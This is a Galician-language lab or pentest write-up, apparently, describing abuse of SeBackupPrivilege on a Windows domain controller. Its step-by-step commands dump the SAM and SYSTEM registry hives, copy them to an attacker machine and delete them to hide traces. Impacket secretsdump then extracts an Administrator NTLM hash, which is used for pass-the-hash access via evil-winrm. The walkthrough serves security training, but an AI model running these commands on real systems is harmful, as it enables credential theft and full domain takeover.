Ir ao contido

Vector de Ataque: Abuso de SeBackupPrivilege (Vía SAM)

Fase: 4. Post-Explotación
Requisitos previos:
Acceso como usuario brais.t.
Conexión WinRM establecida (evil-winrm).

Descrición:
O privilexio SeBackupPrivilege permite ao usuario ler calquera ficheiro do sistema de ficheiros e claves do rexistro, ignorando as ACLs (Listas de Control de Acceso), co propósito de facer copias de seguridade.
Neste ataque, abusaremos deste permiso para exportar as claves do rexistro HKLM\SAM e HKLM\SYSTEM. Aínda que estamos nun Controlador de Dominio, a SAM contén credenciais locais críticas (como o Administrador local ou DSRM) que, neste escenario, permítennos facer Pass-the-Hash para converterse en Domain Admin.

Diagrama de ataque

Fig. Diagrama de ataque


Procedemento Paso a Paso

1. Verificación de Privilexios

Unha vez conectado con Evil-WinRM, verificamos que o usuario brais.t ten o permiso activo.

*Evil-WinRM* PS C:\Users\brais.t\Documents> whoami /priv

INFORMACIÓN DE PRIVILEGIOS
--------------------------
Nombre de privilegio          Descripción                                         Estado
============================= =================================================== ==========
SeBackupPrivilege             Hacer copias de seguridad de archivos y directorios Habilitada
...

2. Exportación das Hives do Rexistro

Usaremos o comando nativo reg save. Grazas ao SeBackupPrivilege, podemos ler estas claves protexidas mentres o sistema está a funcionar.

2.1. Gardar a hive SYSTEM
Contén a clave de arranque ("Boot Key") necesaria para descifrar a SAM.

*Evil-WinRM* PS C:\Users\brais.t\Documents> reg save hklm\system system.hive
La operación se completó correctamente.

2.2. Gardar a hive SAM
Contén os hashes dos usuarios locais (incluído o Administrador).

*Evil-WinRM* PS C:\Users\brais.t\Documents> reg save hklm\sam sam.hive
La operación se completó correctamente.

3. Descarga de Ficheiros

Descargamos os ficheiros xerados á máquina atacante (Kali).

*Evil-WinRM* PS C:\Users\brais.t\Documents> download system.hive
*Evil-WinRM* PS C:\Users\brais.t\Documents> download sam.hive

4. Limpeza

Borramos os ficheiros xerados no servidor para borrar pegadas.

*Evil-WinRM* PS C:\Users\brais.t\Documents> del system.hive
*Evil-WinRM* PS C:\Users\brais.t\Documents> del sam.hive

5. Extracción de Hashes (Offline)

Xa na máquina atacante, usamos impacket-secretsdump para extraer os hashes contidos nos ficheiros do rexistro.

$ impacket-secretsdump -sam sam.hive -system system.hive LOCAL
...
[*] Target system bootKey: 0x...
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrador:500:aad3b435b51404eeaad3b435b51404ee:3ec585243c919f4217175e1918e07780:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
...
[*] Cleaning up...

Resultado Crítico Obtido:
Administrador (RID 500):* Obtivemos o hash NTLM (3ec585...).

6. Explotación: Pass-the-Hash

Usamos o hash recuperado para autenticarnos como Administrador no Controlador de Dominio, logrando control total.

$ evil-winrm -i 192.168.56.100 -u Administrador -H 3ec585243c919f4217175e1918e07780